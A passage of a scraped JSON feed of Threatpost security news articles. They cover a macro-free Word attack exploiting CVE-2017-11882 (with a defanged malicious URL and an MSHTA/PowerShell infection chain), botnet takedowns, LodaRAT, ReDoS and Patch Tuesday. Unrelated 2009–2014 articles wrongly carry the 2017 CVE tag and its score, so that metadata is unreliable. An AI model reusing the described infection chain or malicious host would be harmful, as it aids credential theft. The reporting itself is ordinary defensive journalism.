"\u2018Lone Wolf\u2019 APT Uses Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-20T13:28:13", "id": "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "href": "https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. 
The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection chain uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d researchers wrote.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201d. 
The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (Rich Text Format) file.\n\n\u201cWhen a user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually an RTF file that is downloaded and executed,\u201d researchers wrote.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers an MSHTA command line that downloads and executes an HTML executable (HTA) file. Next, the HTA contains an obfuscated PowerShell script that eventually downloads and executes the remote payload \u2013 the password stealer malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA) that are not often blocked by email or network gateways, unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. 
\u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in the mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. 
This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the \u201cgetElementsByTagName()\u201d method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "Microsoft has released a new fuzzing tool designed specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. 
The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS (regular expression denial of service). Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). Instead of just checking that the next character after 5 is not the end of the string, the engine treats the next character, 6, as a new capture group and starts rechecking from there. 
Once that route fails, it backs up to 1234 and then tries 56 as a separate capture group, then 5 and 6 each as separate capture groups. The end result is that the engine actually ends up evaluating 32 different paths,\u201d he wrote. \n\n\u201cIf we now add just one more numeric character to the evaluation string, the engine will have to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a match. This is an exponential increase in the amount of work being performed by the regex engine. An attacker could provide a relatively short input string\u201430 characters or so\u2014and force the engine to process hundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "Microsoft has gone after another botnet, this time targeting some of the command-and-control infrastructure behind the Zeus network with a takedown effort that included seizing two IP addresses used for C&C servers and filing suit against 39 unnamed defendants. 
The action against Zeus is the latest in a string of such moves by Microsoft and some of its partners against the operators of botnets such as [Kelihos](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) and [Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>).\n\nZeus is one of the more widespread and well-known pieces of malware to appear in the last five years and is among the new breed of tools that\u2019s sold in various forms to anyone who can pay the freight. The Zeus kit enables an attacker to monitor a user\u2019s actions on a compromised machine, steal credentials for online banking or other valuable sites and then rack up huge profits. Like other major botnets operating right now, the Zeus network is not one botnet but dozens and dozens of individual networks operated by various criminals around the world. \n\nMicrosoft\u2019s anti-Zeus operation resulted in the takedown of two C&C servers that are used in the global Zeus network, but the company\u2019s officials say they have no illusions that this move will cripple the entire Zeus system. \n\n\u201cWe don\u2019t expect this action to have wiped out every Zeus botnet operating in the world. However, together, we have proactively disrupted some of the most harmful botnets, and we expect this effort will significantly impact the cybercriminal underground for quite some time. Cybercriminals are in this for the money and this action was an unprecedented strike against the illicit infrastructure on which they rely. 
The operation will help further investigations against those responsible for the threat and help us better protect victims,\u201d Richard Domingues Boscovich, a senior attorney in Microsoft\u2019s Digital Crimes Unit, wrote in an analysis of the [Zeus botnet takedown](<http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx>).\n\nLast Monday, Microsoft [filed suit in the Eastern District of New York](<http://www.zeuslegalnotice.com/>) against the unnamed defendants, saying that they, using various aliases and handles, had operated the Zeus botnet. The company, along with the National Automated Clearing House Association, asked the court for permission to cut off the C&C infrastructure of Zeus and also asked that the case be temporarily sealed in order to preserve the element of surprise against the suspects. The court granted both requests, and on Friday officials from Microsoft, NACHA and the Financial Services Information Sharing Analysis Center went with U.S. Marshals to execute the seizure of the servers.\n\n\u201cOn March 23, Microsoft, FS-ISAC and NACHA \u2013 escorted by the U.S. Marshals \u2013 successfully executed a coordinated physical seizure of command and control servers in two hosting locations to seize and preserve valuable data and virtual evidence from the botnets for the case. We took down two IP addresses behind the Zeus \u2018command and control\u2019 structure. Microsoft also currently monitors 800 domains secured in the operation, which helps us to identify thousands of Zeus-infected computers,\u201d Boscovich said. \n\nThe botnets affected by the Zeus takedown action include some running the Ice-IX and SpyEye variants of the malware. 
The Zeus codebase has forked and evolved over time and some features of the once-competitive SpyEye toolkit were included in some versions recently.\n\nIn an interesting twist to the takedown, Microsoft and the other plaintiffs in the case decided to use the civil section of the RICO statute to go after the group of defendants, allowing them to group the alleged botnet controllers under the umbrella of one organized criminal enterprise. The statute typically is used in organized crime prosecutions, but the nature of the Zeus operation lent itself to the same kind of action.\n\n\u201cUpon information and belief, John Does 1-39 constitute a group of persons associated together for a common purpose of engaging in a course of conduct, as part of an ongoing organization, with the various associates functioning as a continuing unit. The Defendants\u2019 enterprise has a purpose, with relationships among those associated with the enterprise, and longevity sufficient to permit those associates to pursue the enterprise\u2019s purpose. Upon information and belief, Defendants John Doe 1, John Doe 2, and John Doe 3 conspired to, and did, form an associated in fact enterprise (herein after the \u201cZeus Racketeering Enterprise\u201d) with a common purpose of developing and operating a global credential stealing botnet operation as set forth in detail herein,\u201d the complaint filed against the botnet operators says. 
\n\n\u201cBoth the purpose of the Zeus Racketeering Enterprise and the relationship between the Defendants is proven by: (1) the consolidation of the original Zeus botnet and the SpyEye botnet; (2) the subsequent development and operation of the enhanced Ice-IX botnet; and (3) Defendants\u2019 respective and interrelated roles in the sale, operation of, and profiting from the Zeus Botnets in furtherance of Defendants\u2019 common financial interests.\u201d\n\nMicrosoft\u2019s Boscovich said the use of RICO was an important aspect of the case.\n\n\u201cIn criminal court cases, the RICO Act is often associated with cases against organized crime; the same is true in applying the civil section of the law to this case against what we believe is an organization of people behind the Zeus family of botnets. By incorporating the use of the RICO Act, we were able to pursue a consolidated civil case against everyone associated with the Zeus criminal operation, even if those involved in the \u2018organization\u2019 were not necessarily part of the core enterprise,\u201d he said.\n", "cvss3": {}, "published": "2012-03-26T12:05:14", "type": "threatpost", "title": "Microsoft, Financial Groups Execute Takedown of Zeus Botnet Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:34", "id": "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "href": "https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/76364/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "Dennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and 
protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n\nLaw enforcement agents with less than 10 minutes\u2019 training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off for moving. 
\n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-02-09T19:52:36", "description": "A newly discovered variant of the LodaRAT malware, which has historically targeted Windows devices, is being distributed in an ongoing campaign that now also hunts down Android devices and spies on victims.\n\nAlong with this, an updated version of LodaRAT for Windows has also been identified; both versions were seen in a recent campaign targeting Bangladesh, researchers said.\n\nThe campaign reflects an overarching shift in 
strategy for LodaRAT\u2019s developers, as the attack appears to be driven by espionage rather than its previous financial goals. While previous versions of LodaRAT contained credential-stealing capabilities that researchers speculated were used for draining victims\u2019 bank accounts, these newer versions come with a full roundup of information-gathering commands.\n\n\u201cThe fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving,\u201d said researchers with Cisco Talos [on Tuesday](<https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html>). \u201cAlong with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss.\u201d\n\n## **What is the LodaRAT Malware?**\n\nLodaRAT, [first discovered](<https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware>) in September 2016, is a remote access trojan (RAT) that comes with a variety of capabilities for spying on victims, such as recording the microphones and webcams of victims\u2019 devices. The name \u201cLoda\u201d is derived from a directory to which the malware author chose to write keylogger logs.\n\nSince its discovery in 2016 the RAT has proliferated, with multiple new versions being spotted in the wild [as recently as September](<https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html>). The RAT, which is written in AutoIT, appears to be distributed by multiple cybercrime groups that have been using it to target numerous verticals.\n\n## **Recent LodaRAT Cyberattack in Bangladesh**\n\nResearchers observed a campaign involving LodaRAT that began in October and is still active. 
The attackers appear to have a specific interest in Bangladesh-based organizations, including banks and carrier-grade voice-over-IP (VoIP) software vendors.\n\nVitor Ventura, Cisco Talos\u2019 technical lead and senior security researcher, told Threatpost that the initial attack vectors for the campaign involved emails sent to victims with links to malicious applications (involving both the Windows and Android versions) or malicious documents (involving just the Windows version).\n\n\u201cThe campaign uncovered targeting Bangladesh used different levels of lures, from typosquatted domains, to file names directly linked to products or services of their victims,\u201d said researchers.\n\nIn the Windows-targeting maldoc attack, once the victim opened the malicious document, a malicious RTF document exploiting CVE-2017-11882 ([a remote code-execution vulnerability](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) in Microsoft Office) was used to download LodaRAT.\n\n## **LodaRAT\u2019s New Android Variant**\n\nThe Android version of the LodaRAT malware, which researchers call \u201cLoda4Android,\u201d is \u201crelatively simple when compared to other Android malware,\u201d said researchers. For instance, the RAT has specifically avoided techniques often used by Android banking trojans, such as [leveraging the Accessibility APIs](<https://threatpost.com/android-overlay-and-accessibility-features-leave-millions-at-risk/125888/>), in order to steal data.\n\nThe underlying command-and-control (C2) protocol follows the same design pattern as the Windows version, said researchers \u2013 suggesting that the C2 code will be able to handle both versions.\n\nAlso, Loda4Android has \u201call the components of a stalker application,\u201d said researchers. 
The malware collects location data and records audio, and can take photos and screenshots.\n\n\u201cIt can record audio calls, but it will only record what the victim says but not what the counterpart says,\u201d said researchers. \u201cThe common SMS, call log and contact exfiltration functionalities are also present. It is interesting to note that it\u2019s not capable of intercepting the SMS or the calls, like it\u2019s usually seen in banker trojans.\u201d\n\n## **Fresh Windows Loda Version**\n\nThe new version of the LodaRAT that targets Windows systems is version 1.1.8. While it\u2019s mostly the same as previous versions, new commands have been added that extend its capabilities.\n\nFor one, the version comes with new commands that give the threat actor remote access to the target machine via [the Remote Desktop Protocol](<https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/>) (RDP). The new version can now leverage the BASS audio library to capture audio from a connected microphone. BASS is used in Win32, macOS, Linux and PocketPC software to provide streaming and recording functions for music.\n\n\u201cThis new command is an improvement on the previous \u2018Sound\u2019 command which used Windows\u2019 built in Sound Recorder,\u201d said researchers. \u201cThe reason for abandoning the previous method is likely because Windows Sound Recorder can only record audio for a maximum of 60 seconds. 
The new method allows for any length of recording time specified by the threat actor.\u201d\n", "cvss3": {}, "published": "2021-02-09T15:47:03", "type": "threatpost", "title": "Android Devices Hunted by LodaRAT Windows Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2021-02-09T15:47:03", "id": "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "href": "https://threatpost.com/android-devices-lodarat-windows/163769/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote code-execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. 
Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which, while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nThe bulletin affects Microsoft Word 2007; users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. 
\u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month brings 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to seeing around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its share of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Services; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. 
If an attacker has man-in-the-middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Less than a week after the [publication of exploit code](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) for a gaping hole in the FTP Service in Microsoft Internet Information Services (IIS), attackers are launching what is described as \u201climited attacks\u201d against Windows users.\n\nMicrosoft has updated its security advisory to warn of the new attacks and added new mitigation workarounds for businesses running IIS 5.0, 5.1, and 6.0.\n\nIn addition to the in-the-wild attacks, Microsoft warned that a new proof of concept has been published to demonstrate a denial-of-service attack on Windows XP and Windows Server 2003 with read access to the File Transfer Protocol (FTP) service.\n\n\u201cThis does 
not require Write access,\u201d the company warned. \n\nAlso, a new proof of concept allowing DoS was separately disclosed that affects the version of FTP 6 which shipped with Windows Vista and Windows Server 2008. \n\n * Customers should be aware that the Download Center has FTP 7.5 available for Windows Vista and Windows Server 2008. FTP 7.5 is not vulnerable to any of these exploits.\n\nEarlier this week, [Microsoft issued an advisory](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) to confirm the severity of this vulnerability, which allows remote code execution on affected systems running the FTP service and connected to the Internet.\n", "cvss3": {}, "published": "2009-09-08T11:58:04", "type": "threatpost", "title": "Attackers Pounce on Microsoft FTP in IIS Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:48", "id": "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "href": "https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/72235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from 
legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nResearchers found ZeroAccess split into two smaller botnets comprising both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attacker-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nDell added that while it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted 